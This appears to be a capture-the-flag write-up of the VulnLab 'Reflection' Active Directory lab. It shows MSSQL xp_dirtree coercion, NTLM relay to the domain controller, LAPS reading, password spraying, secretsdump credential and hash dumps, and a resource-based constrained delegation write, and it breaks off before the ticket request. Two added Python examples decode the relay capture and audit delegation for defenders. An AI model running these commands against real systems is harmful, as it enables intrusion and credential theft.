vulnlab-reflection

Reflection is a medium-difficulty Active Directory chain of three machines: MS01, WS01 and DC01. On MS01, MSSQL staging credentials are found on an SMB share. From the staging database we coerce an NTLM authentication and relay it to DC01's SMB shares, where the service account has access to the prod share containing the credentials for the production database. That database yields two domain credentials. abbie.smith has GenericAll on MS01, which lets us read its LAPS password and then dump Georgia.Price's password from the credential vault. Georgia.Price in turn has GenericAll on WS01, so with full control of MS01 we perform Resource Based Constrained Delegation (RBCD) against WS01. Dumping WS01 gives Rhys.Garner's password, which is reused by DOM_RGARNER, a member of Domain Admins.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

MSSQL enumeration with the staging credentials:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash --wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []
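To make clear what was actually captured, here is an added example (not part of the writeup and not impacket code) that unpacks the john-format line above. The NTLMv2 "blob" is an NTLMv2_CLIENT_CHALLENGE structure (MS-NLMP 2.2.2.7) whose AV_PAIRs carry the name of the service the client believed it was authenticating to and the channel-binding value; the sample line is copied from the capture, split at structure boundaries for readability, and the relay target IP is the DC from the ntlmrelayx command.

```python
"""Decode a captured Net-NTLMv2 response to see why it could be relayed."""
import struct
from datetime import datetime, timedelta, timezone

# The john-format line impacket-smbserver logged above (fixed 'aaaaaaaaaaaaaaaa'
# server challenge), split at the NTLMv2 structure boundaries; bytes unchanged.
CAPTURED_LINE = "svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:" + "".join([
    "01010000" "00000000" "8009d71aedd8da01" "62c1605a968cd3de" "00000000",  # fixed 28-byte header
    "0100" "1000" "440075004800720044004e0043006e00",                          # MsvAvNbComputerName
    "0300" "1000" "440075004800720044004e0043006e00",                          # MsvAvDnsComputerName
    "0200" "1000" "72004b00430065005200500051005600",                          # MsvAvNbDomainName
    "0400" "1000" "72004b00430065005200500051005600",                          # MsvAvDnsDomainName
    "0700" "0800" "8009d71aedd8da01",                                          # MsvAvTimestamp
    "0600" "0400" "02000000",                                                  # MsvAvFlags
    "0800" "3000" "30000000" "00000000" "00000000" "00300000"
    "6e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d",        # MsvAvSingleHost
    "0a00" "1000" "00000000" "00000000" "00000000" "00000000",                 # MsvAvChannelBindings
    "0900" "1e00" "63006900660073002f00310030002e0038002e0032002e00310033003800",  # MsvAvTargetName
    "0000" "0000" "00000000",                                                  # MsvAvEOL + padding
])

AV_NAMES = {
    0x0001: "MsvAvNbComputerName", 0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName", 0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName", 0x0006: "MsvAvFlags", 0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost", 0x0009: "MsvAvTargetName", 0x000A: "MsvAvChannelBindings",
}
STRING_AV_IDS = {1, 2, 3, 4, 5, 9}  # UTF-16LE values


def filetime_to_datetime(filetime):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_ntlmv2_line(line):
    """Split a john-format NTLMv2 line and decode its AV_PAIR block."""
    user, _unused, domain, server_challenge, nt_proof_str, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    # RespType, HiRespType, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
    _rt, _hrt, _r1, _r2, filetime, client_challenge, _r3 = struct.unpack_from("<BBHIQ8sI", blob, 0)
    av_pairs = {}
    pos = 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        name = AV_NAMES.get(av_id, f"Unknown(0x{av_id:04x})")
        if av_id in STRING_AV_IDS:
            av_pairs[name] = value.decode("utf-16-le")
        elif av_id == 6:
            av_pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:
            av_pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            av_pairs[name] = value.hex()
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof_str": nt_proof_str,
        "timestamp": filetime_to_datetime(filetime),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av_pairs,
    }


def relay_indicators(parsed, relayed_to):
    """Facts a reviewer pulls from the capture when explaining why the relay worked."""
    av = parsed["av_pairs"]
    intended = av.get("MsvAvTargetName", "")
    cbt = av.get("MsvAvChannelBindings", "")
    return {
        "intended_target": intended,
        # the client authenticated to the attacker's host, not to the DC it was relayed to
        "target_mismatch": bool(intended) and relayed_to not in intended,
        # 16 zero bytes: no channel binding token, nothing ties the auth to a TLS channel
        "channel_binding_absent": cbt == "00" * 16,
    }


if __name__ == "__main__":
    parsed = parse_ntlmv2_line(CAPTURED_LINE)
    for key, val in parsed["av_pairs"].items():
        print(f"{key:22} {val}")
    print(relay_indicators(parsed, "10.10.203.133"))
```

The decoded MsvAvTargetName is cifs/10.8.2.138, the attacker's share, yet the same response was accepted by 10.10.203.133. An SMB server does not verify the target name or the (all-zero) channel binding, which is why requiring SMB signing on DC01 and MS01 (both show signing:False in the crackmapexec banners) is the control that stops this relay; for LDAP and HTTP the equivalents are channel binding and Extended Protection.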

Neither MS01 nor DC01 requires SMB signing (signing:False in the crackmapexec banners), so instead of cracking the hash we relay the coerced authentication. Next we run an NTLM relay attack against dc01.reflection.vl, with -i to get an interactive SMB shell on the target:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger the authentication again from the SQL shell:

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my Kali box we connect to the interactive SMB client shell that ntlmrelayx opened on 127.0.0.1:11000:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

Connect with sqsh to dc01.reflection.vl:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

LDAP search (collecting the domain user names into domainUsers.txt):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

BloodHound collection:

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

Check the machine account quota (it is 0, so we cannot add our own computer object and will need an existing machine account for RBCD):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

Check LAPS (abbie.smith has GenericAll on MS01 and can read its password):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

Check which accounts on ws01.reflection.vl accept the LAPS password (local authentication, spraying domainUsers.txt):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the local Administrator account with the LAPS password to RDP to the box and start enumerating it:

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

On MS01 we disable Defender, upload mimikatz.exe and dump credentials; we find:
Georgia.Price
DBl<redacted>id

RBCD attack on ws01.reflection.vl (via MS01)

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

Then we read the current delegation setting on WS01$:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

Then we write MS01$ into it as Georgia.Price:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)
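The attribute impacket-rbcd just wrote, msDS-AllowedToActOnBehalfOfOtherIdentity, is a binary self-relative SECURITY_DESCRIPTOR (MS-DTYP 2.4.6) whose DACL lists the principals that may act on behalf of other identities against WS01$. The following added example (not from the writeup and not impacket code) decodes such a blob so an auditor can list those principals and flag any that are not on an approved list, which is how a defender would spot this write. The descriptor bytes are constructed here as sample input in the layout the DC stores; in practice you would base64-decode the value that ldapsearch prints for the attribute and pass those bytes. The MS01$ SID is the one reported in the output above.

```python
"""List who may act on behalf of other identities against a computer (RBCD audit)."""
import struct

# SID of MS01$ as reported by impacket-rbcd above; BUILTIN\Administrators as owner.
MS01_SID = "S-1-5-21-3375389138-1770791787-1490854311-1104"
ADMINISTRATORS_SID = "S-1-5-32-544"

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data, offset=0):
    """Binary SID at offset -> ('S-1-5-...', length in bytes)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", data, offset + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids, mask=0x000F01FF):
    """Constructed sample input: a self-relative SECURITY_DESCRIPTOR whose DACL holds
    one ACCESS_ALLOWED_ACE per SID, the shape the DC stores in the attribute."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # AceType, AceFlags, AceSize, Mask, then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(ADMINISTRATORS_SID)
    header_len = 20  # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         header_len, header_len, 0, header_len + len(owner))
    return header + owner + acl  # group offset reuses the owner SID


def allowed_to_act_sids(sd_bytes):
    """SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL.
    An empty attribute (what the 'read' action reported before the write) means
    no delegation is configured, so the result is an empty list."""
    if not sd_bytes:
        return []
    revision, _sbz1, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd_bytes, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _rev, _sbz, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd_bytes, dacl_off)
    pos = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd_bytes, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd_bytes, pos + 8)[0])
        pos += ace_size  # AceSize covers the header, mask and SID
    return sids


def unexpected_delegations(sd_bytes, allow_list=()):
    """Principals allowed to delegate to this host that are not on the approved list."""
    return [s for s in allowed_to_act_sids(sd_bytes) if s not in allow_list]


if __name__ == "__main__":
    print("before write:", allowed_to_act_sids(b""))
    sample = build_rbcd_descriptor([MS01_SID])
    print("after write: ", allowed_to_act_sids(sample))
    print("unexpected:  ", unexpected_delegations(sample))
```

Running the audit periodically over every computer object (or alerting on directory change events for this attribute) catches the write regardless of which account made it; here MS01$ shows up as an unexpected delegation on WS01$ the moment the attribute is populated.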

Then, as MS01$ (using the NT hash from the secretsdump above), we request a service ticket for cifs/WS01 impersonating Administrator:

